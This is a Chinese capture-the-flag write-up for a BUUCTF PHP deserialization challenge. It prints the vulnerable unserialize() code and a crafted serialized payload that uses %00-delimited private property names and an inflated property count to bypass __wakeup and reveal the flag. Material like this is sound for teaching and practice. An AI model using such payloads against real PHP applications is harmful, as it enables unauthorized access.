要点:私有变量序列化是使用:/0+类名+/0+变量名来区分私有
这道题前端小哥哥得加鸡腿
0X00
刚打开时页面没有任何东西,一般使用dirseach来跑目录,由于提示网站备份,扫秒到的www.zip十分可疑,访问http://3b39917f-a42b-44f5-b9a2-45d677a54c2a.node3.buuoj.cn/www.zip得到源码。
index.php的php部分
<?php include ‘class.php‘; $select = $_GET[‘select‘]; $res=unserialize(@$select); ?>
class.php
<?php include ‘flag.php‘; error_reporting(0); class Name{ private $username = ‘nonono‘; private $password = ‘yesyes‘; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = ‘guest‘; } function __destruct(){ if ($this->password != 100) { echo "</br>NO!!!hacker!!!</br>"; echo "You name is: "; echo $this->username;echo "</br>"; echo "You password is: "; echo $this->password;echo "</br>"; die(); } if ($this->username === ‘admin‘) { global $flag; echo $flag; }else{ echo "</br>hello my friend~~</br>sorry i can‘t give you the flag!"; die(); } } } ?>
还有个flag.php,flag明显在里面,但是怎么可能这么轻易看到
从index.php可以得出来上传select参数进行反序列化,所以我们要通过构造序列化读取flag
<?php class Name{ private $username = ‘nonono‘; private $password = ‘yesyes‘; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } } $a = new Name(‘admin‘, 100); var_dump(serialize($a)); ?>
得到
string(77) "O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}"
注意Nameusername只有12个字符,还有两个是/0.所以最后是
select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
不加%00反序列化就会出错。
原文:https://www.cnblogs.com/jiluxuexi/p/12860054.html